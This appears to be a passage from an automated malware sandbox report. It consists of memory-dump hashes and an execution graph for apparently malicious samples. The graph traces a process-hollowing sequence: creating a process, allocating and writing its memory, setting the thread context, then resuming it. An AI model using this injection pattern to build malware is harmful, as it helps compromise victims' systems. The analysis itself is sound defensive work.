                        • Instruction Fuzzy Hash: 46D0C9B0D12208DBDB44EFB8E959B5DBBB8EB40745F1041E9C94893290EA355A54CF92
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4253e8bcda5d23b4e26bb7981bbe088de0798dd39869825d405a6e8c36fd686d
                        • Instruction ID: 41aa3b3d1b5827e8728b3dde769c88f9ff56dc7980f21771f78ff30efa366b9e
                        • Opcode Fuzzy Hash: 4253e8bcda5d23b4e26bb7981bbe088de0798dd39869825d405a6e8c36fd686d
                        • Instruction Fuzzy Hash: 13E04C74A04218DFDB55CF94CC91BACBBB5BB4D310F248059E60DAB395D6326D92DF40
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f7af08996a005c6bd59cf95fe2dd5fe6b02d1af1c028581b9f0458cd9da12eb
                        • Instruction ID: 7406749096467be70108fdb24c34d20822933d468660a9650654559bdb800da1
                        • Opcode Fuzzy Hash: 8f7af08996a005c6bd59cf95fe2dd5fe6b02d1af1c028581b9f0458cd9da12eb
                        • Instruction Fuzzy Hash: 82D0C975902208EFDB10DFADDE4975DBBF8EB08311F1440A9D848D3321E6356A00EB51
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c432f686cc9000b33ea8c97203b3ade905d0690e0023fe437e74fe10d7aff9fd
                        • Instruction ID: 5bf5b10772b09bd97c91ebc8e35247620e7f94fd70e0b0ce382865ac7651f8cd
                        • Opcode Fuzzy Hash: c432f686cc9000b33ea8c97203b3ade905d0690e0023fe437e74fe10d7aff9fd
                        • Instruction Fuzzy Hash: 2AC0123085320CABD714DFA8ED52F6EB7ACDB81214F4011A9C888133A0EA312A00DBA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: `"m
                        • API String ID: 0-589777399
                        • Opcode ID: f1d3aea65582e4dbdfe7fcc4647c0a6b5999dded639472dc1bf1bb0de4165545
                        • Instruction ID: 5200b96320493729d2fd72c2d86a5e44105b3cbdc0fb04b307c5b08f732c3dde
                        • Opcode Fuzzy Hash: f1d3aea65582e4dbdfe7fcc4647c0a6b5999dded639472dc1bf1bb0de4165545
                        • Instruction Fuzzy Hash: F4E11874E102598FCB18DFA9C580AADFBF2BF89305F248169D819AB356D731AD41CF60
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 132ed916a0f97a68a91f4b7565157e6d258c4445a9b4b6cb853c5d96470bfa4a
                        • Instruction ID: 7b616d75eb1216a3a28d663baecc7059d66986dfddf9c9ba89484e2979a34efd
                        • Opcode Fuzzy Hash: 132ed916a0f97a68a91f4b7565157e6d258c4445a9b4b6cb853c5d96470bfa4a
                        • Instruction Fuzzy Hash: 8CE108B4E102598FCB14DFA9C580AADFBF2BF89305F248169D818AB356D730AD45CF64
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 59313c81f783aa8d888adbb424da28e743e644ace98cb08a21cabdab970798d7
                        • Instruction ID: f455866b2412f661572c57f14bf1ceeb91e24a63543dffd584ec595c424b0733
                        • Opcode Fuzzy Hash: 59313c81f783aa8d888adbb424da28e743e644ace98cb08a21cabdab970798d7
                        • Instruction Fuzzy Hash: 05E1E874E102598FCB14DFA9C580AADFBF2FF89305F248169D818AB356D730A945CFA1
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 76488f90b50a19a265e2a8084e246ad9fb887daef76d50aa1eb4284b5f2311e4
                        • Instruction ID: a152088d940eb870b5afe8762007f575ed49cc301f04348771daf1d2621a14bb
                        • Opcode Fuzzy Hash: 76488f90b50a19a265e2a8084e246ad9fb887daef76d50aa1eb4284b5f2311e4
                        • Instruction Fuzzy Hash: B9E10A74E102598FCB14DFA9C580AADFBF2BF89305F248169D818AB356D731AD45CFA0
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 847475b21b39c3f3a5412759c64cbecb3069733136c0483b17c459efa72aa9c1
                        • Instruction ID: 621b4f447648ced152156bc28180881022bc3254e94a21d3445cdb6c5fb5275b
                        • Opcode Fuzzy Hash: 847475b21b39c3f3a5412759c64cbecb3069733136c0483b17c459efa72aa9c1
                        • Instruction Fuzzy Hash: 28E11A74E102598FCB14DFA9C580AADFBF2BF89305F248169D818A7356D730AD45CF64
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25c35612eab8840fddf0a9e928a8e3de1bc2682303766dcd54352458d13c633a
                        • Instruction ID: 4fc8cc80b412e4b66b15d189489703a8c5c9eb8434fdad4a39be05d51d6fea3d
                        • Opcode Fuzzy Hash: 25c35612eab8840fddf0a9e928a8e3de1bc2682303766dcd54352458d13c633a
                        • Instruction Fuzzy Hash: 1C414970D28219DFDB08CFAAC8446EEBBF6AB8D302F24D029D809E3251D7744995DF58
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f3526608ded117b266cffb764df549e54b14324061a38018237476a570a5fde0
                        • Instruction ID: dedb6d008738cbe95267fa9faf51402396ca689c927d11cb7bdc303f32927d07
                        • Opcode Fuzzy Hash: f3526608ded117b266cffb764df549e54b14324061a38018237476a570a5fde0
                        • Instruction Fuzzy Hash: 42513B74E142598FDB14CFA9C5805AEFBF2BF89305F24816AD808A7356D7319D46CFA0
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d5d498fadab121ee59fdab877b1acc9c1d1173a43919314bdd07d21404b8f46
                        • Instruction ID: 149b9c057e262400b2cf2c41d9d39a015b2f6b5f64a41d3d8ad3172dbf81f193
                        • Opcode Fuzzy Hash: 2d5d498fadab121ee59fdab877b1acc9c1d1173a43919314bdd07d21404b8f46
                        • Instruction Fuzzy Hash: 29418D70D2420ADFDB04CFA9D98469EFBF2FF89301F10946AC414A7294D7785A09CF55

                        Execution Graph

                        Execution Coverage:19.5%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:201
                        Total number of Limit Nodes:3
                        execution_graph 9628 17ec04 9630 17eb0e 9628->9630 9629 17ed64 9630->9629 9634 1f50b98 9630->9634 9652 1f50b90 9630->9652 9670 1f50b88 9630->9670 9635 1f50bb2 9634->9635 9636 1f50bba 9635->9636 9689 1f51074 9635->9689 9699 1f510aa 9635->9699 9704 1f5126a 9635->9704 9714 1f50feb 9635->9714 9728 1f51368 9635->9728 9733 1f50fe3 9635->9733 9746 1f514a6 9635->9746 9759 1f51467 9635->9759 9769 1f51185 9635->9769 9774 1f5131a 9635->9774 9779 1f5173f 9635->9779 9789 1f50fbc 9635->9789 9802 1f511f2 9635->9802 9806 1f50f51 9635->9806 9819 1f515b4 9635->9819 9636->9629 9654 1f50b92 9652->9654 9653 1f50bba 9653->9629 9654->9653 9655 1f51074 4 API calls 9654->9655 9656 1f515b4 2 API calls 9654->9656 9657 1f50f51 6 API calls 9654->9657 9658 1f511f2 2 API calls 9654->9658 9659 1f50fbc 6 API calls 9654->9659 9660 1f5173f 4 API calls 9654->9660 9661 1f5131a 2 API calls 9654->9661 9662 1f51185 2 API calls 9654->9662 9663 1f51467 4 API calls 9654->9663 9664 1f514a6 6 API calls 9654->9664 9665 1f50fe3 6 API calls 9654->9665 9666 1f51368 2 API calls 9654->9666 9667 1f50feb 6 API calls 9654->9667 9668 1f5126a 4 API calls 9654->9668 9669 1f510aa 2 API calls 9654->9669 9655->9653 9656->9653 9657->9653 9658->9653 9659->9653 9660->9653 9661->9653 9662->9653 9663->9653 9664->9653 9665->9653 9666->9653 9667->9653 9668->9653 9669->9653 9671 1f50b90 12 API calls 9670->9671 9672 1f50b8f 9671->9672 9673 1f50bba 9672->9673 9674 1f51074 4 API calls 9672->9674 9675 1f515b4 2 API calls 9672->9675 9676 1f50f51 6 API calls 9672->9676 9677 1f511f2 2 API calls 9672->9677 9678 1f50fbc 6 API calls 9672->9678 9679 1f5173f 4 API calls 9672->9679 9680 1f5131a 2 API calls 9672->9680 9681 1f51185 2 API calls 9672->9681 9682 1f51467 4 API calls 9672->9682 9683 1f514a6 6 API calls 9672->9683 9684 1f50fe3 6 API calls 9672->9684 9685 1f51368 2 API calls 9672->9685 9686 1f50feb 6 API calls 9672->9686 9687 1f5126a 4 API calls 9672->9687 9688 1f510aa 2 API calls 9672->9688 9673->9629 9674->9673 9675->9673 9676->9673 9677->9673 9678->9673 9679->9673 9680->9673 9681->9673 9682->9673 9683->9673 9684->9673 9685->9673 9686->9673 9687->9673 9688->9673 9691 1f51080 9689->9691 9690 1f510c2 9823 17dad0 9690->9823 9827 17dac9 9690->9827 9691->9690 9692 1f51753 9691->9692 9693 1f5108b 9691->9693 9692->9636 9831 17dbc0 9692->9831 9835 17dbb8 9692->9835 9693->9636 9694 1f519e4 9694->9636 9700 1f510c2 9699->9700 9702 17dad0 ResumeThread 9700->9702 9703 17dac9 ResumeThread 9700->9703 9701 1f510d7 9701->9636 9702->9701 9703->9701 9706 1f51080 9704->9706 9705 1f510c2 9710 17dad0 ResumeThread 9705->9710 9711 17dac9 ResumeThread 9705->9711 9706->9705 9707 1f51753 9706->9707 9708 1f5108b 9706->9708 9707->9636 9712 17dbc0 Wow64SetThreadContext 9707->9712 9713 17dbb8 Wow64SetThreadContext 9707->9713 9708->9636 9709 1f519e4 9709->9636 9710->9708 9711->9708 9712->9709 9713->9709 9716 1f50f52 9714->9716 9715 1f51aeb 9715->9636 9716->9715 9839 17e5dd 9716->9839 9843 17e5e8 9716->9843 9717 1f51055 9718 1f510c2 9717->9718 9719 1f51753 9717->9719 9720 1f5108b 9717->9720 9722 17dad0 ResumeThread 9718->9722 9723 17dac9 ResumeThread 9718->9723 9719->9636 9724 17dbc0 Wow64SetThreadContext 9719->9724 9725 17dbb8 Wow64SetThreadContext 9719->9725 9720->9636 9721 1f519e4 9721->9636 9722->9720 9723->9720 9724->9721 9725->9721 9729 1f51336 9728->9729 9730 1f5136f 9728->9730 9729->9728 9847 17e250 9729->9847 9851 17e248 9729->9851 9734 1f50f52 9733->9734 9742 17e5dd CreateProcessA 9734->9742 9743 17e5e8 CreateProcessA 9734->9743 9735 1f510c2 9744 17dad0 ResumeThread 9735->9744 9745 17dac9 ResumeThread 9735->9745 9736 1f51753 9736->9636 9740 17dbc0 Wow64SetThreadContext 9736->9740 9741 17dbb8 Wow64SetThreadContext 9736->9741 9737 1f51055 9737->9735 9737->9736 9738 1f5108b 9737->9738 9738->9636 9739 1f519e4 9739->9636 9740->9739 9741->9739 9742->9737 9743->9737 9744->9738 9745->9738 9747 1f51449 9746->9747 9747->9746 9855 17e3a9 9747->9855 9859 17e3b0 9747->9859 9748 1f51080 9749 1f5108b 9748->9749 9750 1f510c2 9748->9750 9751 1f51753 9748->9751 9749->9636 9749->9749 9753 17dad0 ResumeThread 9750->9753 9754 17dac9 ResumeThread 9750->9754 9751->9636 9757 17dbc0 Wow64SetThreadContext 9751->9757 9758 17dbb8 Wow64SetThreadContext 9751->9758 9752 1f519e4 9752->9636 9753->9749 9754->9749 9757->9752 9758->9752 9761 1f51080 9759->9761 9760 1f510c2 9767 17dad0 ResumeThread 9760->9767 9768 17dac9 ResumeThread 9760->9768 9761->9760 9763 1f5108b 9761->9763 9764 1f51753 9761->9764 9762 1f519e4 9762->9636 9763->9636 9764->9636 9765 17dbc0 Wow64SetThreadContext 9764->9765 9766 17dbb8 Wow64SetThreadContext 9764->9766 9765->9762 9766->9762 9767->9763 9768->9763 9770 1f5119c 9769->9770 9772 17e250 WriteProcessMemory 9770->9772 9773 17e248 WriteProcessMemory 9770->9773 9771 1f512fb 9771->9636 9772->9771 9773->9771 9775 1f51336 9774->9775 9776 1f5136f 9775->9776 9777 17e250 WriteProcessMemory 9775->9777 9778 17e248 WriteProcessMemory 9775->9778 9777->9775 9778->9775 9781 1f51745 9779->9781 9780 1f51753 9780->9636 9787 17dbc0 Wow64SetThreadContext 9780->9787 9788 17dbb8 Wow64SetThreadContext 9780->9788 9781->9780 9783 1f510c2 9781->9783 9784 1f510d7 9781->9784 9782 1f519e4 9782->9636 9785 17dad0 ResumeThread 9783->9785 9786 17dac9 ResumeThread 9783->9786 9784->9636 9785->9784 9786->9784 9787->9782 9788->9782 9790 1f50f52 9789->9790 9796 17e5dd CreateProcessA 9790->9796 9797 17e5e8 CreateProcessA 9790->9797 9791 1f510c2 9798 17dad0 ResumeThread 9791->9798 9799 17dac9 ResumeThread 9791->9799 9792 1f51753 9792->9636 9800 17dbc0 Wow64SetThreadContext 9792->9800 9801 17dbb8 Wow64SetThreadContext 9792->9801 9793 1f51055 9793->9791 9793->9792 9794 1f5108b 9793->9794 9794->9636 9795 1f519e4 9795->9636 9796->9793 9797->9793 9798->9794 9799->9794 9800->9795 9801->9795 9804 17e250 WriteProcessMemory 9802->9804 9805 17e248 WriteProcessMemory 9802->9805 9803 1f511af 9803->9636 9804->9803 9805->9803 9807 1f50f5c 9806->9807 9817 17e5dd CreateProcessA 9807->9817 9818 17e5e8 CreateProcessA 9807->9818 9808 1f5108b 9808->9636 9809 1f51055 9809->9808 9810 1f510c2 9809->9810 9812 1f51753 9809->9812 9813 17dad0 ResumeThread 9810->9813 9814 17dac9 ResumeThread 9810->9814 9811 1f519e4 9811->9636 9812->9636 9815 17dbc0 Wow64SetThreadContext 9812->9815 9816 17dbb8 Wow64SetThreadContext 9812->9816 9813->9808 9814->9808 9815->9811 9816->9811 9817->9809 9818->9809 9863 17e120 9819->9863 9867 17e128 9819->9867 9820 1f515d2 9824 17db14 ResumeThread 9823->9824 9826 17db66 9824->9826 9826->9693 9828 17dad0 ResumeThread 9827->9828 9830 17db66 9828->9830 9830->9693 9832 17dc09 Wow64SetThreadContext 9831->9832 9834 17dc87 9832->9834 9834->9694 9836 17dbc0 Wow64SetThreadContext 9835->9836 9838 17dc87 9836->9838 9838->9694 9840 17e5e8 CreateProcessA 9839->9840 9842 17e8cd 9840->9842 9844 17e66f CreateProcessA 9843->9844 9846 17e8cd 9844->9846 9848 17e29c WriteProcessMemory 9847->9848 9850 17e33b 9848->9850 9850->9729 9852 17e250 WriteProcessMemory 9851->9852 9854 17e33b 9852->9854 9854->9729 9856 17e3fc ReadProcessMemory 9855->9856 9858 17e47a 9856->9858 9858->9748 9860 17e3fc ReadProcessMemory 9859->9860 9862 17e47a 9860->9862 9862->9748 9864 17e127 VirtualAllocEx 9863->9864 9866 17e1ea 9864->9866 9866->9820 9868 17e16c VirtualAllocEx 9867->9868 9870 17e1ea 9868->9870 9870->9820
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1541357399bb8d5ae5a7c129fb7d0371eea6914b9a337f5f3370d7023f5f549
                        • Instruction ID: 44b96535a71f6ec4ad6de2a102df4b0d3cf1ee629712efa5f29dda3e97b97ae2
                        • Opcode Fuzzy Hash: b1541357399bb8d5ae5a7c129fb7d0371eea6914b9a337f5f3370d7023f5f549
                        • Instruction Fuzzy Hash: A6B01213DDE2909EC7430C0404841F48BBC850B0A0F0B31425995A3803448B900B0689

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 74 17e5dd-17e681 77 17e683-17e69a 74->77 78 17e6ca-17e6f2 74->78 77->78 83 17e69c-17e6a1 77->83 81 17e6f4-17e708 78->81 82 17e738-17e78e 78->82 81->82 93 17e70a-17e70f 81->93 91 17e7d4-17e8cb CreateProcessA 82->91 92 17e790-17e7a4 82->92 84 17e6c4-17e6c7 83->84 85 17e6a3-17e6ad 83->85 84->78 88 17e6b1-17e6c0 85->88 89 17e6af 85->89 88->88 90 17e6c2 88->90 89->88 90->84 111 17e8d4-17e9b9 91->111 112 17e8cd-17e8d3 91->112 92->91 100 17e7a6-17e7ab 92->100 94 17e732-17e735 93->94 95 17e711-17e71b 93->95 94->82 97 17e71f-17e72e 95->97 98 17e71d 95->98 97->97 101 17e730 97->101 98->97 102 17e7ce-17e7d1 100->102 103 17e7ad-17e7b7 100->103 101->94 102->91 105 17e7bb-17e7ca 103->105 106 17e7b9 103->106 105->105 108 17e7cc 105->108 106->105 108->102 124 17e9bb-17e9bf 111->124 125 17e9c9-17e9cd 111->125 112->111 124->125 128 17e9c1 124->128 126 17e9cf-17e9d3 125->126 127 17e9dd-17e9e1 125->127 126->127 129 17e9d5 126->129 130 17e9e3-17e9e7 127->130 131 17e9f1-17e9f5 127->131 128->125 129->127 130->131 132 17e9e9 130->132 133 17e9f7-17ea20 131->133 134 17ea2b-17ea36 131->134 132->131 133->134 137 17ea37 134->137 137->137
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017E8AF
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID: eC>$eC>
                        • API String ID: 963392458-2703793578
                        • Opcode ID: 1dc755e91a3f9da7c5546e9c71f8b1be12eea4f8114a1cf0ad81f411b15c0fcd
                        • Instruction ID: d440d2e168d81b6de3cd3b6295ff5a95be0f3b0eeab570427ed7e623b2c6b2c0
                        • Opcode Fuzzy Hash: 1dc755e91a3f9da7c5546e9c71f8b1be12eea4f8114a1cf0ad81f411b15c0fcd
                        • Instruction Fuzzy Hash: EFC11371D002298FDF24CFA8C841BEEBBF1BB09304F1095AAD959B7250DB749A85CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 139 17e5e8-17e681 141 17e683-17e69a 139->141 142 17e6ca-17e6f2 139->142 141->142 147 17e69c-17e6a1 141->147 145 17e6f4-17e708 142->145 146 17e738-17e78e 142->146 145->146 157 17e70a-17e70f 145->157 155 17e7d4-17e8cb CreateProcessA 146->155 156 17e790-17e7a4 146->156 148 17e6c4-17e6c7 147->148 149 17e6a3-17e6ad 147->149 148->142 152 17e6b1-17e6c0 149->152 153 17e6af 149->153 152->152 154 17e6c2 152->154 153->152 154->148 175 17e8d4-17e9b9 155->175 176 17e8cd-17e8d3 155->176 156->155 164 17e7a6-17e7ab 156->164 158 17e732-17e735 157->158 159 17e711-17e71b 157->159 158->146 161 17e71f-17e72e 159->161 162 17e71d 159->162 161->161 165 17e730 161->165 162->161 166 17e7ce-17e7d1 164->166 167 17e7ad-17e7b7 164->167 165->158 166->155 169 17e7bb-17e7ca 167->169 170 17e7b9 167->170 169->169 172 17e7cc 169->172 170->169 172->166 188 17e9bb-17e9bf 175->188 189 17e9c9-17e9cd 175->189 176->175 188->189 192 17e9c1 188->192 190 17e9cf-17e9d3 189->190 191 17e9dd-17e9e1 189->191 190->191 193 17e9d5 190->193 194 17e9e3-17e9e7 191->194 195 17e9f1-17e9f5 191->195 192->189 193->191 194->195 196 17e9e9 194->196 197 17e9f7-17ea20 195->197 198 17ea2b-17ea36 195->198 196->195 197->198 201 17ea37 198->201 201->201
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017E8AF
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID: eC>$eC>
                        • API String ID: 963392458-2703793578
                        • Opcode ID: 4be840002c3be1b5042b4e8df92c60836deac50cdb4d6e8715985448cddb9931
                        • Instruction ID: 4fb04d070c0c8b98e28dbab228184bc51ffd9fca2ae59eb5ba1b6df775959384
                        • Opcode Fuzzy Hash: 4be840002c3be1b5042b4e8df92c60836deac50cdb4d6e8715985448cddb9931
                        • Instruction Fuzzy Hash: D6C10471D002298FDF24CFA8C841BEEBBF1BB09304F1095AAD919B7254DB749A85CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 372 17e248-17e2bb 375 17e2d2-17e339 WriteProcessMemory 372->375 376 17e2bd-17e2cf 372->376 378 17e342-17e394 375->378 379 17e33b-17e341 375->379 376->375 379->378
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017E323
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID: eC>
                        • API String ID: 3559483778-2138442192
                        • Opcode ID: da8f122dbe55976584aeef81284a97267e80706b8fa9c16b649bf384a8f635f3
                        • Instruction ID: eb0af42b7ccbacdc4af86ce3d8b8b6bc646d3b82934ccf5ff31aa0c505142201
                        • Opcode Fuzzy Hash: da8f122dbe55976584aeef81284a97267e80706b8fa9c16b649bf384a8f635f3
                        • Instruction Fuzzy Hash: C641ABB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE818B7210D335AA55CF64

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 384 17e250-17e2bb 386 17e2d2-17e339 WriteProcessMemory 384->386 387 17e2bd-17e2cf 384->387 389 17e342-17e394 386->389 390 17e33b-17e341 386->390 387->386 390->389
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017E323
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID: eC>
                        • API String ID: 3559483778-2138442192
                        • Opcode ID: 744ad4cc128484dbe16d0ccf89d5b8e9e4ca2af4115f3c5a936e1fdd1ff75225
                        • Instruction ID: b7b54cd0a5978cef8bff1ad221ae062e49314838799591d72b7ac9b0e3fced71
                        • Opcode Fuzzy Hash: 744ad4cc128484dbe16d0ccf89d5b8e9e4ca2af4115f3c5a936e1fdd1ff75225
                        • Instruction Fuzzy Hash: 1F41AAB5D012489FCF00CFA9D984AEEFBF1BB49314F24942AE818B7210D334AA55CF64

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 395 17e3a9-17e478 ReadProcessMemory 398 17e481-17e4d3 395->398 399 17e47a-17e480 395->399 399->398
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017E462
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID: eC>
                        • API String ID: 1726664587-2138442192
                        • Opcode ID: 27259177f5d8fbf7b423e3098b9048fc95ebe5aeab9ddd2aad0c219f3568ca25
                        • Instruction ID: 49be3c5c98c3e9f415a4b6367c6d72c4283f0eac166bc726c35f9e14df6714c6
                        • Opcode Fuzzy Hash: 27259177f5d8fbf7b423e3098b9048fc95ebe5aeab9ddd2aad0c219f3568ca25
                        • Instruction Fuzzy Hash: 2D4199B5D002589FCF10CFA9D984AEEFBB1BF49310F20942AE815B7240D735A955CF65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 404 17e3b0-17e478 ReadProcessMemory 407 17e481-17e4d3 404->407 408 17e47a-17e480 404->408 408->407
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017E462
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID: eC>
                        • API String ID: 1726664587-2138442192
                        • Opcode ID: 55d0ad6ab735500ca4c09ae1fe374814ce2e02b51187f2daded1e54b90b86010
                        • Instruction ID: 1e4906ef23a4784ae1501f7db8971a628322b952ebd20cc5305dc0b24f9ad06a
                        • Opcode Fuzzy Hash: 55d0ad6ab735500ca4c09ae1fe374814ce2e02b51187f2daded1e54b90b86010
                        • Instruction Fuzzy Hash: 3B41A8B5D002589FCF10CFAAD984AEEFBB1BF49310F20942AE815B7240D735A955CF65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 413 17e120-17e1e8 VirtualAllocEx 417 17e1f1-17e23b 413->417 418 17e1ea-17e1f0 413->418 418->417
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0017E1D2
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: eC>
                        • API String ID: 4275171209-2138442192
                        • Opcode ID: cb8ac3516de6e4e9341c32d39016760a9db0c9bcc8103374a38acca59525e481
                        • Instruction ID: b7614609b9c5c42e29c40ba069067ebdb50c649ab91dc1822caa0f7a70f661d7
                        • Opcode Fuzzy Hash: cb8ac3516de6e4e9341c32d39016760a9db0c9bcc8103374a38acca59525e481
                        • Instruction Fuzzy Hash: B341BAB5D002489FCF10CFA9D980AEEFBB1BF49310F20942AE815B7250D735A945CF54

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 423 17e128-17e1e8 VirtualAllocEx 426 17e1f1-17e23b 423->426 427 17e1ea-17e1f0 423->427 427->426
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0017E1D2
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: eC>
                        • API String ID: 4275171209-2138442192
                        • Opcode ID: 95130e74039486a189e3f2e5fadb36820010834d309246459c43bcdfd3738962
                        • Instruction ID: e2af5ffce51a147948422cfa15547c077a21dff4a2698a950fd489ad0a6b8edf
